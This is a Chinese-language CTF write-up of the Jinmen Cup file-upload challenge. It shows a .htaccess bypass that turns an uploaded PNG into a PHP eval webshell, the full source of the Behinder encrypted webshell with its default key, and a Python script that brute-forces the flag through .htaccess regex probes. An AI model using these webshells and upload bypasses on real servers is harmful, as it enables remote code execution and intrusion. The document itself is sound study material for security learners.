记一次对津门杯web-upload的详解

举报
亿人安全 发表于 2023/04/11 20:31:44 2023/04/11
【摘要】 前言:最近在学习一些ctf的东西,所以自己想从一个小白的身份,复现一些web的漏洞。学习一些大佬的思路!一、文件上传漏洞常规思路1.首先这个是一道文件上传题,常规思路就是上传png、gif等进行bp抓包进行绕过限制这里普及一下文件上传漏洞的知识。文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是...

前言:

最近在学习一些ctf的东西,所以自己想从一个小白的身份,复现一些web的漏洞。学习一些大佬的思路!
一、文件上传漏洞常规思路
1.首先这个是一道文件上传题,常规思路就是上传png、gif等进行bp抓包进行绕过限制
这里普及一下文件上传漏洞的知识。
文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
常见web上传漏洞的解题手法大致分为白名单和黑名单
常用工具:冰蝎、蚁剑、中国菜刀等等+php一句话木马。
文件上传靶机推荐:https://github.com/c0ny1/upload-labs

 

二.津门杯文件上传wp

1.现在回到我们的题,我先使用php写入一句话木马,然后改为png格式,进行上传。

2.发现可以上传,但是没有解析。

3.然后看看响应包,直接302了。说明注入和常规文件上传思路都没戏的!

4.然后从源码出发,看了看源码发现不能注入,也不能绕过上传。

5.然后看到了这个php规则。经过百度之后发现先知一位大佬写了:https://xz.aliyun.com/t/8267

<Directory ~ “/var/www/html/upload/[a-f0-9]{32}/”> php_flag engine off</Directory>

 

三、解题思路(1)

1.开始构造文件上传文件

2.新建.htaccess文件

第一个文件叫.htaccess
内容是:

<FilesMatch “1.png”>
SetHandler application/x-httpd-php
php_flag engine on
</FilesMatch>

3.新建1.png,进行文件上传

第二个文件名叫1.png
<?php eval($_GET[‘cmd’]);?>

4.先上传.htaccess文件,然后再上传.png文件,上传的png文件就会被解析了。

5.上传.htaccess文件

6.上传png文件

7.然后找到上传图片的路径
<img src=”upload/e8be345643e019844763188240c38377/1.png”>

8.读文件
http://122.112.248.222:20003/upload/e6a96d9444d3a938319f35616e5d1add/1.png
成功上传,解析

9.读phpinfo

/upload/e6a96d9444d3a938319f35616e5d1add/1.png?cmd=phpinfo();

10.扫目录
/upload/e6a96d9444d3a938319f35616e5d1add/1.png?cmd=var_dump(scandir(%22/%22));

/upload/e6a96d9444d3a938319f35616e5d1add/1.png?cmd=readfile(%22/flag%22);

 

方法2:

冰蝎:地址:https://github.com/rebeyond/Behinder
首先访问站点

真nm嚣张,干你走起

因为配置文件中使用<directory>禁止了upload沙盒解析,所以需要上传.htaccess,随便选择一个文件,通过Burp抓包修改参数如下

解释一下,将文件名和文件内容修改为.htaccess还不够,还需要将.htaccess放至站点目录之下

之后上传冰蝎马(当然期间还上传了一句话和大马)

直接连你,密码为rebeyond,成功getshell

在根目录下找到flag,flag为 flag{BNjmiWsBgTW4fsLoDgWLvgnfqk1CI3Nx}

冰蝎马如下

<?php
@errorreporting(0);
session_start();
$key = ”e45e329feb5d925b”; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION[‘k’] = $key;
session_write_close();
$post = file_get_contents(“php: //input”);
    if (!extension_loaded(‘openssl’)) {
        $t = ”base64“ . ”decode”;
        $post = $t($post . ””);
        for ($i = 0;$i < strlen($post);$i++) {
            $post[$i] = $post[$i] ^ $key[$i + 1 & 15];
        }
    } else {
        $post = openssl_decrypt($post, "AES128", $key);
    }
    $arr = explode('|', $post);
    $func = $arr[0];
    $params = $arr[1];
    class C {
        public function __invoke($p) {
            eval($p . "");
        }
    }
    @call_user_func(new C(), $params);
?>

 

方法3:NulL大佬的脚本

<If “file(‘/flag’)=~ /”’flag{xxxx”’/”>
ErrorDocument 404 “wupco”
</If>

原理:匹配不到就返回404且有wupco这个字符串,直接脚本逐位爆破

import requests
import string
import hashlib
ip = requests.get('http://118.24.185.108/ip.php').text
print(ip)
def check(a):
    htaccess = '''
    <If "file('/flag')=~ /'''+a+'''/">
    ErrorDocument 404 "wupco"
    </If>
    '''
    resp = requests.post("http://122.112.248.222:20003/index.php?id=69660",data={'submit': 'submit'}, files={'file': ('.htaccess',htaccess)} )
    a = requests.get("http://122.112.248.222:20003/upload/"+ip+"/a").text
    if "wupco" not in a:
        return False
    else:
        return True
flag = "flag{BN"
c = string.ascii_letters + string.digits + "\{\}"
for j in range(32):
    for i in c:
        print("checking: "+ flag+i)
        if check(flag+i):
            flag = flag+i
            print(flag)
            break
        else:
            continue

总结:复现过程中遇到了一些自己从来没有遇到的问题。也碰到了很多没有接触过的知识,感谢在复现过程中提供思路的朋友。感觉到自己技术还有很多不足的地方,希望会的大佬跳过,大佬勿喷!我就是菜弟弟。

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。